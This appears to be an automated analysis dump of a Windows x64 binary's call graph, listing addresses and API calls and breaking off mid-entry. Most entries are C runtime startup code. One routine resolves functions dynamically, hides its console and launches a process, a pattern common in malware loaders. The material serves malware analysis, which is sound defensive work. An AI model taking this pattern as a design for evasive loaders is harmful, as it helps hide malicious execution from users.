BuildCatchObjectHelperInternal 18576->18579 18578 7ff7340e7bd4 18580 7ff7340e7c5a 18603 7ff7340f4e34 18580->18603 18582->18578 18582->18580 18708 7ff7340f46d8 18582->18708 18584 7ff7340e7c5f 18609 7ff7340d94c0 18584->18609 18588 7ff7340e7c83 18588->18579 18715 7ff7340e7854 18588->18715 18592 7ff7340e76d8 18591->18592 18726 7ff7340e9500 18592->18726 18597 7ff7340e76ed 18597->18571 18597->18572 18601 7ff7340f5503 18599->18601 18600 7ff7340f552a 18600->18582 18601->18600 19237 7ff7340e7a8c 18601->19237 18604 7ff7340f4e44 18603->18604 18607 7ff7340f4e59 18603->18607 18604->18607 19366 7ff7340f4ad4 18604->19366 18607->18584 19443 7ff7340d9c80 18609->19443 18611 7ff7340d94fe 18612 7ff7340d9506 GetModuleHandleA 18611->18612 19446 7ff7340d9d20 18612->19446 18614 7ff7340d9537 18615 7ff7340d953f GetProcAddress 18614->18615 19449 7ff7340d9dc0 18615->19449 18617 7ff7340d9578 18618 7ff7340d9580 GetProcAddress 18617->18618 19452 7ff7340d9e60 18618->19452 18620 7ff7340d95b9 18621 7ff7340d95c1 GetProcAddress 18620->18621 19455 7ff7340d9f00 18621->19455 18623 7ff7340d95fa 18624 7ff7340d9602 GetProcAddress 18623->18624 19458 7ff7340d9fc0 18624->19458 18626 7ff7340d963b 18627 7ff7340d9643 GetProcAddress 18626->18627 19461 7ff7340da060 18627->19461 18629 7ff7340d967c 18630 7ff7340d9684 GetProcAddress 18629->18630 18631 7ff7340d96a1 FreeConsole 18630->18631 19464 7ff7340d1220 18631->19464 18639 7ff7340d96f3 19476 7ff7340e56a0 18639->19476 18643 7ff7340d973e 19482 7ff7340daa70 18643->19482 18645 7ff7340d975e 19485 7ff7340daa10 18645->19485 18647 7ff7340d9796 19488 7ff7340de4e0 18647->19488 18649 7ff7340d97a4 18650 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18649->18650 18651 7ff7340d97b2 18650->18651 19491 7ff7340da1f0 18651->19491 18653 7ff7340d97ed 19494 7ff7340f265c 18653->19494 18656 7ff7340d9823 18657 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18656->18657 18658 7ff7340d9838 18657->18658 18659 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 18658->18659 18661 7ff7340d9c6d 18659->18661 18660 7ff7340d9841 19497 7ff7340dd310 18660->19497 18713 7ff7340e8048 GetModuleHandleW 18661->18713 18664 7ff7340daa10 49 API calls 18665 7ff7340d98c1 18664->18665 19501 7ff7340da9b0 18665->19501 18667 7ff7340d98f6 18668 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18667->18668 18669 7ff7340d9904 18668->18669 18670 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18669->18670 18671 7ff7340d9912 18670->18671 19504 7ff7340dcea0 18671->19504 18677 7ff7340d99e5 19522 7ff7340da2b0 18677->19522 18679 7ff7340d9a25 19525 7ff7340daad0 18679->19525 18681 7ff7340d9a44 Concurrency::details::WorkQueue::IsStructuredEmpty 18682 7ff7340d9a9a CreateProcessA 18681->18682 18683 7ff7340d9af0 18682->18683 18687 7ff7340d9be2 18682->18687 18684 7ff7340d9b2c GetLastError 18683->18684 19531 7ff7340da3b0 18684->19531 18686 7ff7340d9b50 19534 7ff7340da660 18686->19534 18688 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18687->18688 18689 7ff7340d9c2c 18688->18689 18690 7ff7340df160 81 API calls 18689->18690 18692 7ff7340d9c3a 18690->18692 18694 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18692->18694 18696 7ff7340d9c48 18694->18696 18698 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18696->18698 18698->18658 18699 7ff7340da660 80 API calls 18700 7ff7340d9b88 _CallMemberFunction0 18699->18700 18701 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18700->18701 18702 7ff7340d9baf 18701->18702 19553 7ff7340df160 18702->19553 18704 7ff7340d9bbd 18705 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18704->18705 18706 7ff7340d9bcb 18705->18706 18707 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 18706->18707 18707->18658 18709 7ff7340f46ef 18708->18709 18710 7ff7340f4710 18708->18710 18709->18580 20191 7ff7340f6fec 18710->20191 18714 7ff7340e8059 18713->18714 18714->18588 18716 7ff7340e7865 18715->18716 18717 7ff7340e7875 18716->18717 18718 7ff7340e9528 7 API calls 18716->18718 18717->18578 18718->18717 18720 7ff7340e7f1a memcpy_s _invalid_parameter_noinfo_noreturn 18719->18720 18721 7ff7340e7f39 RtlCaptureContext RtlLookupFunctionEntry 18720->18721 18722 7ff7340e7f62 RtlVirtualUnwind 18721->18722 18723 7ff7340e7f9e memcpy_s 18721->18723 18722->18723 18724 7ff7340e7fd0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18723->18724 18725 7ff7340e801e _invalid_parameter_noinfo_noreturn 18724->18725 18725->18574 18745 7ff7340eca78 18726->18745 18732 7ff7340e76e9 18732->18597 18733 7ff7340f53c4 18732->18733 18734 7ff73410142c 18733->18734 18735 7ff7340e76f6 18734->18735 18781 7ff7340f8e54 18734->18781 18792 7ff734100998 18734->18792 18807 7ff734100a50 18734->18807 18735->18597 18739 7ff7340e9528 18735->18739 18740 7ff7340e9530 18739->18740 18741 7ff7340e953a 18739->18741 19229 7ff7340e9918 18740->19229 18741->18597 18744 7ff7340ecac0 __vcrt_uninitialize_locks DeleteCriticalSection 18744->18741 18747 7ff7340eca80 18745->18747 18748 7ff7340ecab1 18747->18748 18749 7ff7340e9509 18747->18749 18762 7ff7340edbd4 18747->18762 18750 7ff7340ecac0 __vcrt_uninitialize_locks DeleteCriticalSection 18748->18750 18749->18732 18751 7ff7340e98d0 18749->18751 18750->18749 18777 7ff7340edaa8 18751->18777 18767 7ff7340ed958 18762->18767 18765 7ff7340edc14 18765->18747 18766 7ff7340edc1f InitializeCriticalSectionAndSpinCount 18766->18765 18768 7ff7340eda42 18767->18768 18769 7ff7340ed99c __vcrt_InitializeCriticalSectionEx 18767->18769 18768->18765 18768->18766 18769->18768 18770 7ff7340ed9ca LoadLibraryExW 18769->18770 18773 7ff7340eda89 GetProcAddress 18769->18773 18776 7ff7340eda0d LoadLibraryExW 18769->18776 18771 7ff7340ed9eb GetLastError 18770->18771 18772 7ff7340eda69 18770->18772 18771->18769 18772->18773 18774 7ff7340eda80 FreeLibrary 18772->18774 18773->18768 18775 7ff7340eda9a 18773->18775 18774->18773 18775->18768 18776->18769 18776->18772 18778 7ff7340ed958 __vcrt_InitializeCriticalSectionEx 5 API calls 18777->18778 18779 7ff7340edacd TlsAlloc 18778->18779 18813 7ff7340f276c EnterCriticalSection 18781->18813 18783 7ff7340f8e64 18784 7ff734101774 53 API calls 18783->18784 18785 7ff7340f8e6d 18784->18785 18786 7ff7340f8c5c 55 API calls 18785->18786 18791 7ff7340f8e7b 18785->18791 18788 7ff7340f8e76 18786->18788 18787 7ff7340f27c0 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 18789 7ff7340f8e87 18787->18789 18790 7ff7340f8d4c GetStdHandle GetFileType 18788->18790 18789->18734 18790->18791 18791->18787 18793 7ff7341009bb 18792->18793 18794 7ff7341009c5 18793->18794 18823 7ff7340f276c EnterCriticalSection 18793->18823 18796 7ff734100a37 18794->18796 18814 7ff7340f3bdc 18794->18814 18796->18734 18800 7ff734100a4f 18803 7ff734100aa2 18800->18803 18804 7ff7340f7dd8 52 API calls 18800->18804 18803->18734 18805 7ff734100a8c 18804->18805 18806 7ff734100728 68 API calls 18805->18806 18806->18803 18808 7ff734100a5d 18807->18808 18812 7ff734100aa2 18807->18812 19024 7ff7340f7dd8 18808->19024 18812->18734 18824 7ff7340ff1c8 18814->18824 18819 7ff7340f3bfd IsProcessorFeaturePresent 18821 7ff7340f3c0c 18819->18821 18820 7ff7340f3c27 BuildCatchObjectHelperInternal 18850 7ff7340ee0b0 18821->18850 18858 7ff7340ff180 18824->18858 18830 7ff7340ff344 18835 7ff7340ff478 18830->18835 18837 7ff7340ff3ab 18830->18837 18843 7ff7340ff372 18830->18843 18831 7ff7340ff26f 18831->18830 18887 7ff7340f276c EnterCriticalSection 18831->18887 18832 7ff7340f3bf4 18832->18819 18832->18820 18834 7ff7340ff25c 18834->18831 18834->18832 18836 7ff7340ff2f1 18834->18836 18838 7ff7340ff485 BuildCatchObjectHelperInternal 18835->18838 18911 7ff7340f27c0 LeaveCriticalSection 18835->18911 18881 7ff7340f3518 18836->18881 18848 7ff7340ff409 18837->18848 18910 7ff7340f27c0 LeaveCriticalSection 18837->18910 18843->18837 18888 7ff7340f7d04 GetLastError 18843->18888 18847 7ff7340f7d04 _Getctype 47 API calls 18847->18837 18849 7ff7340f7d04 47 API calls _Getctype 18848->18849 18849->18848 18851 7ff7340ee0ea memcpy_s _invalid_parameter_noinfo_noreturn 18850->18851 18852 7ff7340ee112 RtlCaptureContext RtlLookupFunctionEntry 18851->18852 18853 7ff7340ee182 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18852->18853 18854 7ff7340ee14c RtlVirtualUnwind 18852->18854 18855 7ff7340ee1d4 _invalid_parameter_noinfo_noreturn 18853->18855 18854->18853 19010 7ff7340e7a40 18855->19010 18863 7ff7340f276c EnterCriticalSection 18858->18863 18872 7ff7340f7efc FlsSetValue 18875 7ff7340f7f1a 18872->18875 18876 7ff7340f7f08 FlsSetValue 18872->18876 18873 7ff7340f7eec FlsSetValue 18874 7ff7340f7ef5 18873->18874 18919 7ff7340f80dc 18874->18919 18925 7ff7340f7ab4 18875->18925 18876->18874 18882 7ff7340f7e7c memcpy_s 11 API calls 18881->18882 18883 7ff7340f3521 18882->18883 18884 7ff7340ee37c 18883->18884 18953 7ff7340ee214 18884->18953 18889 7ff7340f7d45 FlsSetValue 18888->18889 18890 7ff7340f7d28 FlsGetValue 18888->18890 18891 7ff7340f7d35 18889->18891 18892 7ff7340f7d57 18889->18892 18890->18891 18893 7ff7340f7d3f 18890->18893 18894 7ff7340f7db1 SetLastError 18891->18894 18895 7ff7340f8064 _Getctype 11 API calls 18892->18895 18893->18889 18896 7ff7340f7dd1 18894->18896 18897 7ff7340f7dbe 18894->18897 18898 7ff7340f7d66 18895->18898 18899 7ff7340f3bdc BuildCatchObjectHelperInternal 40 API calls 18896->18899 18897->18847 18900 7ff7340f7d84 FlsSetValue 18898->18900 18901 7ff7340f7d74 FlsSetValue 18898->18901 18902 7ff7340f7dd6 18899->18902 18904 7ff7340f7da2 18900->18904 18905 7ff7340f7d90 FlsSetValue 18900->18905 18903 7ff7340f7d7d 18901->18903 18906 7ff7340f80dc __free_lconv_mon 11 API calls 18903->18906 18907 7ff7340f7ab4 _Getctype 11 API calls 18904->18907 18905->18903 18906->18891 18908 7ff7340f7daa 18907->18908 18909 7ff7340f80dc __free_lconv_mon 11 API calls 18908->18909 18909->18894 18913 7ff7340f80c6 18916 7ff7340f3518 memcpy_s 10 API calls 18913->18916 18914 7ff7340f80aa RtlAllocateHeap 18915 7ff7340f7ede 18914->18915 18917 7ff7340f8075 _Getctype 18914->18917 18915->18872 18915->18873 18916->18915 18917->18913 18917->18914 18930 7ff7340f4214 18917->18930 18920 7ff7340f80e1 HeapFree 18919->18920 18921 7ff7340f7ead SetLastError 18919->18921 18920->18921 18922 7ff7340f80fc GetLastError 18920->18922 18921->18834 18923 7ff7340f8109 __free_lconv_mon 18922->18923 18924 7ff7340f3518 memcpy_s 9 API calls 18923->18924 18924->18921 18939 7ff7340f798c 18925->18939 18933 7ff7340f4254 18930->18933 18938 7ff7340f276c EnterCriticalSection 18933->18938 18935 7ff7340f4261 18936 7ff7340f27c0 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 18935->18936 18937 7ff7340f4226 18936->18937 18937->18917 18951 7ff7340f276c EnterCriticalSection 18939->18951 18954 7ff7340ee23f 18953->18954 18961 7ff7340ee2b0 18954->18961 18957 7ff7340ee289 18958 7ff7340ee29e 18957->18958 18960 7ff7340edf90 _vswprintf_s_l 47 API calls 18957->18960 18958->18832 18960->18958 18980 7ff7340edff8 18961->18980 18965 7ff7340ee266 18965->18957 18971 7ff7340edf90 18965->18971 18972 7ff7340edfe3 18971->18972 18973 7ff7340edfa3 GetLastError 18971->18973 18972->18957 18974 7ff7340edfb3 18973->18974 18975 7ff7340f7f44 _vswprintf_s_l 16 API calls 18974->18975 18976 7ff7340edfce SetLastError 18975->18976 18976->18972 18977 7ff7340edff1 18976->18977 18978 7ff7340f3bdc BuildCatchObjectHelperInternal 45 API calls 18977->18978 18979 7ff7340edff6 18978->18979 18981 7ff7340ee014 GetLastError 18980->18981 18982 7ff7340ee04f 18980->18982 18983 7ff7340ee024 18981->18983 18982->18965 18986 7ff7340ee064 18982->18986 18993 7ff7340f7f44 18983->18993 18987 7ff7340ee080 GetLastError SetLastError 18986->18987 18988 7ff7340ee098 18986->18988 18987->18988 18988->18965 18989 7ff7340ee3cc IsProcessorFeaturePresent 18988->18989 18990 7ff7340ee3df 18989->18990 18991 7ff7340ee0b0 _invalid_parameter_noinfo_noreturn 14 API calls 18990->18991 18992 7ff7340ee3fa GetCurrentProcess TerminateProcess 18991->18992 18994 7ff7340f7f63 FlsGetValue 18993->18994 18995 7ff7340f7f7e FlsSetValue 18993->18995 18997 7ff7340f7f78 18994->18997 19007 7ff7340ee03f SetLastError 18994->19007 18996 7ff7340f7f8b 18995->18996 18995->19007 18998 7ff7340f8064 _Getctype 11 API calls 18996->18998 18997->18995 18999 7ff7340f7f9a 18998->18999 19000 7ff7340f7fb8 FlsSetValue 18999->19000 19001 7ff7340f7fa8 FlsSetValue 18999->19001 19003 7ff7340f7fd6 19000->19003 19004 7ff7340f7fc4 FlsSetValue 19000->19004 19002 7ff7340f7fb1 19001->19002 19005 7ff7340f80dc __free_lconv_mon 11 API calls 19002->19005 19006 7ff7340f7ab4 _Getctype 11 API calls 19003->19006 19004->19002 19005->19007 19008 7ff7340f7fde 19006->19008 19007->18982 19009 7ff7340f80dc __free_lconv_mon 11 API calls 19008->19009 19009->19007 19011 7ff7340e7a49 19010->19011 19012 7ff7340e7a54 19011->19012 19013 7ff7340e813c IsProcessorFeaturePresent 19011->19013 19012->18820 19014 7ff7340e8154 19013->19014 19019 7ff7340e8330 RtlCaptureContext 19014->19019 19020 7ff7340e834a RtlLookupFunctionEntry 19019->19020 19021 7ff7340e8360 RtlVirtualUnwind 19020->19021 19022 7ff7340e8167 19020->19022 19021->19020 19021->19022 19023 7ff7340e8108 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19022->19023 19025 7ff7340f7e04 FlsSetValue 19024->19025 19026 7ff7340f7de9 FlsGetValue 19024->19026 19027 7ff7340f7df6 19025->19027 19029 7ff7340f7e11 19025->19029 19026->19027 19028 7ff7340f7dfe 19026->19028 19030 7ff7340f7dfc 19027->19030 19031 7ff7340f3bdc BuildCatchObjectHelperInternal 47 API calls 19027->19031 19028->19025 19032 7ff7340f8064 _Getctype 11 API calls 19029->19032 19044 7ff734100728 19030->19044 19033 7ff7340f7e79 19031->19033 19034 7ff7340f7e20 19032->19034 19035 7ff7340f7e3e FlsSetValue 19034->19035 19036 7ff7340f7e2e FlsSetValue 19034->19036 19038 7ff7340f7e5c 19035->19038 19039 7ff7340f7e4a FlsSetValue 19035->19039 19037 7ff7340f7e37 19036->19037 19040 7ff7340f80dc __free_lconv_mon 11 API calls 19037->19040 19041 7ff7340f7ab4 _Getctype 11 API calls 19038->19041 19039->19037 19040->19027 19042 7ff7340f7e64 19041->19042 19043 7ff7340f80dc __free_lconv_mon 11 API calls 19042->19043 19043->19030 19045 7ff734100998 68 API calls 19044->19045 19046 7ff73410075d 19045->19046 19067 7ff734100428 19046->19067 19049 7ff73410077a 19049->18812 19052 7ff734100793 19053 7ff7340f80dc __free_lconv_mon 11 API calls 19052->19053 19053->19049 19054 7ff7341007a2 19054->19054 19081 7ff734100acc 19054->19081 19057 7ff73410089e 19058 7ff7340f3518 memcpy_s 11 API calls 19057->19058 19059 7ff7341008a3 19058->19059 19063 7ff7340f80dc __free_lconv_mon 11 API calls 19059->19063 19060 7ff7341008f9 19062 7ff734100960 19060->19062 19092 7ff734100258 19060->19092 19061 7ff7341008b8 19061->19060 19064 7ff7340f80dc __free_lconv_mon 11 API calls 19061->19064 19066 7ff7340f80dc __free_lconv_mon 11 API calls 19062->19066 19063->19049 19064->19060 19066->19049 19107 7ff7340f35fc 19067->19107 19070 7ff73410045a 19072 7ff73410046f 19070->19072 19073 7ff73410045f GetACP 19070->19073 19071 7ff734100448 GetOEMCP 19071->19072 19072->19049 19074 7ff7340fb8f0 19072->19074 19073->19072 19075 7ff7340fb93b 19074->19075 19079 7ff7340fb8ff _Getctype 19074->19079 19077 7ff7340f3518 memcpy_s 11 API calls 19075->19077 19076 7ff7340fb922 RtlAllocateHeap 19078 7ff7340fb939 19076->19078 19076->19079 19077->19078 19078->19052 19078->19054 19079->19075 19079->19076 19080 7ff7340f4214 std::_Facet_Register 2 API calls 19079->19080 19080->19079 19082 7ff734100428 49 API calls 19081->19082 19083 7ff734100af9 19082->19083 19084 7ff734100c4f 19083->19084 19086 7ff734100b36 IsValidCodePage 19083->19086 19091 7ff734100b50 memcpy_s 19083->19091 19085 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19084->19085 19087 7ff734100895 19085->19087 19086->19084 19088 7ff734100b47 19086->19088 19087->19057 19087->19061 19089 7ff734100b76 GetCPInfo 19088->19089 19088->19091 19089->19084 19089->19091 19139 7ff734100540 19091->19139 19228 7ff7340f276c EnterCriticalSection 19092->19228 19108 7ff7340f3620 19107->19108 19109 7ff7340f361b 19107->19109 19108->19109 19110 7ff7340f7d04 _Getctype 47 API calls 19108->19110 19109->19070 19109->19071 19111 7ff7340f363b 19110->19111 19115 7ff7340fb950 19111->19115 19116 7ff7340fb965 19115->19116 19117 7ff7340f365e 19115->19117 19116->19117 19123 7ff734102ef0 19116->19123 19119 7ff7340fb9bc 19117->19119 19120 7ff7340fb9d1 19119->19120 19121 7ff7340fb9e4 19119->19121 19120->19121 19136 7ff734100ab0 19120->19136 19121->19109 19124 7ff7340f7d04 _Getctype 47 API calls 19123->19124 19125 7ff734102eff 19124->19125 19126 7ff734102f4a 19125->19126 19135 7ff7340f276c EnterCriticalSection 19125->19135 19126->19117 19137 7ff7340f7d04 _Getctype 47 API calls 19136->19137 19138 7ff734100ab9 19137->19138 19140 7ff73410057d GetCPInfo 19139->19140 19149 7ff734100673 19139->19149 19145 7ff734100590 19140->19145 19140->19149 19141 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19143 7ff734100712 19141->19143 19143->19084 19150 7ff7340fe7c8 19145->19150 19148 7ff7340fec8c 57 API calls 19148->19149 19149->19141 19151 7ff7340f35fc TranslateName 47 API calls 19150->19151 19152 7ff7340fe80a 19151->19152 19170 7ff7340ff494 19152->19170 19154 7ff7340fe847 19157 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19154->19157 19155 7ff7340fe840 19155->19154 19156 7ff7340fb8f0 _fread_nolock 12 API calls 19155->19156 19159 7ff7340fe904 19155->19159 19161 7ff7340fe870 memcpy_s ctype 19155->19161 19156->19161 19158 7ff7340fe93d 19157->19158 19165 7ff7340fec8c 19158->19165 19159->19154 19160 7ff7340f80dc __free_lconv_mon 11 API calls 19159->19160 19160->19154 19161->19159 19162 7ff7340ff494 _fread_nolock MultiByteToWideChar 19161->19162 19163 7ff7340fe8e6 19162->19163 19163->19159 19164 7ff7340fe8ea GetStringTypeW 19163->19164 19164->19159 19166 7ff7340f35fc TranslateName 47 API calls 19165->19166 19167 7ff7340fecb1 19166->19167 19173 7ff7340fe958 19167->19173 19172 7ff7340ff49d MultiByteToWideChar 19170->19172 19174 7ff7340fe999 ctype 19173->19174 19175 7ff7340ff494 _fread_nolock MultiByteToWideChar 19174->19175 19179 7ff7340fe9e3 19175->19179 19176 7ff7340fec61 19177 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19176->19177 19178 7ff7340fec6f 19177->19178 19178->19148 19179->19176 19180 7ff7340fb8f0 _fread_nolock 12 API calls 19179->19180 19181 7ff7340fea1b ctype 19179->19181 19192 7ff7340feb19 19179->19192 19180->19181 19183 7ff7340ff494 _fread_nolock MultiByteToWideChar 19181->19183 19181->19192 19182 7ff7340f80dc __free_lconv_mon 11 API calls 19182->19176 19184 7ff7340fea8e 19183->19184 19184->19192 19204 7ff7340f8824 19184->19204 19187 7ff7340fead9 19189 7ff7340f8824 __crtLCMapStringW 7 API calls 19187->19189 19187->19192 19188 7ff7340feb2a 19190 7ff7340fb8f0 _fread_nolock 12 API calls 19188->19190 19191 7ff7340febfc 19188->19191 19194 7ff7340feb48 ctype 19188->19194 19189->19192 19190->19194 19191->19192 19193 7ff7340f80dc __free_lconv_mon 11 API calls 19191->19193 19192->19176 19192->19182 19193->19192 19194->19192 19195 7ff7340f8824 __crtLCMapStringW 7 API calls 19194->19195 19196 7ff7340febc8 19195->19196 19196->19191 19197 7ff7340febfe 19196->19197 19198 7ff7340febe8 19196->19198 19200 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19197->19200 19212 7ff7340ff524 19198->19212 19201 7ff7340febf6 19200->19201 19201->19191 19202 7ff7340fec16 19201->19202 19202->19192 19203 7ff7340f80dc __free_lconv_mon 11 API calls 19202->19203 19203->19192 19215 7ff7340f81cc 19204->19215 19207 7ff7340f886a LCMapStringEx 19209 7ff7340f88fb 19207->19209 19208 7ff7340f88c9 19225 7ff7340f8910 19208->19225 19209->19187 19209->19188 19209->19192 19211 7ff7340f88d3 LCMapStringW 19211->19209 19214 7ff7340ff548 WideCharToMultiByte 19212->19214 19216 7ff7340f8229 19215->19216 19223 7ff7340f8224 __vcrt_InitializeCriticalSectionEx 19215->19223 19216->19207 19216->19208 19217 7ff7340f8259 LoadLibraryW 19219 7ff7340f832e 19217->19219 19220 7ff7340f827e GetLastError 19217->19220 19218 7ff7340f834e GetProcAddress 19218->19216 19222 7ff7340f835f 19218->19222 19219->19218 19221 7ff7340f8345 FreeLibrary 19219->19221 19220->19223 19221->19218 19222->19216 19223->19216 19223->19217 19223->19218 19224 7ff7340f82b8 LoadLibraryExW 19223->19224 19224->19219 19224->19223 19226 7ff7340f81cc __crtLCMapStringW 5 API calls 19225->19226 19227 7ff7340f893e __crtLCMapStringW 19226->19227 19227->19211 19230 7ff7340e9535 19229->19230 19231 7ff7340e9927 19229->19231 19230->18744 19233 7ff7340edaf0 19231->19233 19234 7ff7340ed958 __vcrt_InitializeCriticalSectionEx 5 API calls 19233->19234 19235 7ff7340edb17 TlsFree 19234->19235 19238 7ff7340e7a9c 19237->19238 19254 7ff7340f5568 19238->19254 19240 7ff7340e7aa8 19260 7ff7340e770c 19240->19260 19242 7ff7340e7ac0 _RTC_Initialize 19252 7ff7340e7b15 19242->19252 19265 7ff7340e78bc 19242->19265 19243 7ff7340e7ef4 7 API calls 19244 7ff7340e7b41 19243->19244 19244->18601 19246 7ff7340e7ad5 19268 7ff7340f494c 19246->19268 19250 7ff7340e7aea 19251 7ff7340f5c70 47 API calls 19250->19251 19251->19252 19252->19243 19253 7ff7340e7b31 19252->19253 19253->18601 19255 7ff7340f5579 19254->19255 19256 7ff7340f5581 19255->19256 19257 7ff7340f3518 memcpy_s 11 API calls 19255->19257 19256->19240 19258 7ff7340f5590 19257->19258 19259 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19258->19259 19259->19256 19261 7ff7340e771d 19260->19261 19264 7ff7340e7722 __scrt_release_startup_lock 19260->19264 19262 7ff7340e7ef4 7 API calls 19261->19262 19261->19264 19263 7ff7340e7796 19262->19263 19264->19242 19301 7ff7340e7880 19265->19301 19267 7ff7340e78c5 19267->19246 19269 7ff7340e7ae1 19268->19269 19270 7ff7340f496c 19268->19270 19269->19252 19300 7ff7340e8458 InitializeSListHead 19269->19300 19271 7ff7340f4974 19270->19271 19272 7ff7340f498a 19270->19272 19273 7ff7340f3518 memcpy_s 11 API calls 19271->19273 19274 7ff734100a50 68 API calls 19272->19274 19276 7ff7340f4979 19273->19276 19275 7ff7340f498f 19274->19275 19316 7ff734100134 GetModuleFileNameW 19275->19316 19278 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19276->19278 19278->19269 19284 7ff7340f4a01 19287 7ff7340f3518 memcpy_s 11 API calls 19284->19287 19285 7ff7340f4a19 19286 7ff7340f4724 47 API calls 19285->19286 19293 7ff7340f4a35 19286->19293 19288 7ff7340f4a06 19287->19288 19290 7ff7340f80dc __free_lconv_mon 11 API calls 19288->19290 19289 7ff7340f4a3b 19292 7ff7340f80dc __free_lconv_mon 11 API calls 19289->19292 19291 7ff7340f4a14 19290->19291 19291->19269 19292->19269 19293->19289 19294 7ff7340f4a80 19293->19294 19295 7ff7340f4a67 19293->19295 19298 7ff7340f80dc __free_lconv_mon 11 API calls 19294->19298 19296 7ff7340f80dc __free_lconv_mon 11 API calls 19295->19296 19297 7ff7340f4a70 19296->19297 19299 7ff7340f80dc __free_lconv_mon 11 API calls 19297->19299 19298->19289 19299->19291 19302 7ff7340e789a 19301->19302 19304 7ff7340e7893 19301->19304 19305 7ff7340f5250 19302->19305 19304->19267 19308 7ff7340f4e8c 19305->19308 19315 7ff7340f276c EnterCriticalSection 19308->19315 19317 7ff73410018d 19316->19317 19318 7ff734100179 GetLastError 19316->19318 19319 7ff7340f35fc TranslateName 47 API calls 19317->19319 19340 7ff7340f348c 19318->19340 19322 7ff7341001bb 19319->19322 19321 7ff734100186 19323 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19321->19323 19327 7ff7341001cc 19322->19327 19345 7ff7340f83e0 19322->19345 19326 7ff7340f49a6 19323->19326 19328 7ff7340f4724 19326->19328 19348 7ff7340f3dc8 19327->19348 19330 7ff7340f4762 19328->19330 19332 7ff7340f47ce 19330->19332 19362 7ff734100e00 19330->19362 19331 7ff7340f48bf 19334 7ff7340f48ec 19331->19334 19332->19331 19333 7ff734100e00 47 API calls 19332->19333 19333->19332 19335 7ff7340f4904 19334->19335 19336 7ff7340f493c 19334->19336 19335->19336 19337 7ff7340f8064 _Getctype 11 API calls 19335->19337 19336->19284 19336->19285 19338 7ff7340f4932 19337->19338 19339 7ff7340f80dc __free_lconv_mon 11 API calls 19338->19339 19339->19336 19341 7ff7340f7e7c memcpy_s 11 API calls 19340->19341 19342 7ff7340f3499 __free_lconv_mon 19341->19342 19343 7ff7340f7e7c memcpy_s 11 API calls 19342->19343 19344 7ff7340f34bb 19343->19344 19344->19321 19346 7ff7340f81cc __crtLCMapStringW 5 API calls 19345->19346 19347 7ff7340f8400 19346->19347 19347->19327 19349 7ff7340f3e07 19348->19349 19353 7ff7340f3dec 19348->19353 19350 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19349->19350 19356 7ff7340f3e0c 19349->19356 19351 7ff7340f3e63 19350->19351 19354 7ff7340f3e6a GetLastError 19351->19354 19355 7ff7340f3e95 19351->19355 19351->19356 19352 7ff7340f3518 memcpy_s 11 API calls 19352->19353 19353->19321 19357 7ff7340f348c _fread_nolock 11 API calls 19354->19357 19358 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19355->19358 19356->19352 19356->19353 19359 7ff7340f3e77 19357->19359 19360 7ff7340f3ebc 19358->19360 19361 7ff7340f3518 memcpy_s 11 API calls 19359->19361 19360->19353 19360->19354 19361->19353 19363 7ff734100d8c 19362->19363 19364 7ff7340f35fc TranslateName 47 API calls 19363->19364 19365 7ff734100db0 19364->19365 19365->19330 19367 7ff7340f4aed 19366->19367 19376 7ff7340f4ae9 19366->19376 19368 7ff734100a50 68 API calls 19367->19368 19369 7ff7340f4af2 19368->19369 19389 7ff734100e14 GetEnvironmentStringsW 19369->19389 19372 7ff7340f4aff 19374 7ff7340f80dc __free_lconv_mon 11 API calls 19372->19374 19373 7ff7340f4b0b 19409 7ff7340f4b48 19373->19409 19374->19376 19376->18607 19381 7ff7340f4c9c 19376->19381 19378 7ff7340f80dc __free_lconv_mon 11 API calls 19379 7ff7340f4b32 19378->19379 19380 7ff7340f80dc __free_lconv_mon 11 API calls 19379->19380 19380->19376 19382 7ff7340f4cc5 19381->19382 19383 7ff7340f4cde 19381->19383 19382->18607 19383->19382 19384 7ff7340f8064 _Getctype 11 API calls 19383->19384 19385 7ff7340f4d6e 19383->19385 19386 7ff7340ff524 WideCharToMultiByte _vswprintf_s_l 19383->19386 19388 7ff7340f80dc __free_lconv_mon 11 API calls 19383->19388 19384->19383 19387 7ff7340f80dc __free_lconv_mon 11 API calls 19385->19387 19386->19383 19387->19382 19388->19383 19390 7ff734100e44 19389->19390 19391 7ff7340f4af7 19389->19391 19392 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19390->19392 19391->19372 19391->19373 19393 7ff734100e95 19392->19393 19394 7ff734100e9c FreeEnvironmentStringsW 19393->19394 19395 7ff7340fb8f0 _fread_nolock 12 API calls 19393->19395 19394->19391 19396 7ff734100eaf 19395->19396 19397 7ff734100ec0 19396->19397 19398 7ff734100eb7 19396->19398 19400 7ff7340ff524 _vswprintf_s_l WideCharToMultiByte 19397->19400 19399 7ff7340f80dc __free_lconv_mon 11 API calls 19398->19399 19401 7ff734100ebe 19399->19401 19402 7ff734100ee3 19400->19402 19401->19394 19403 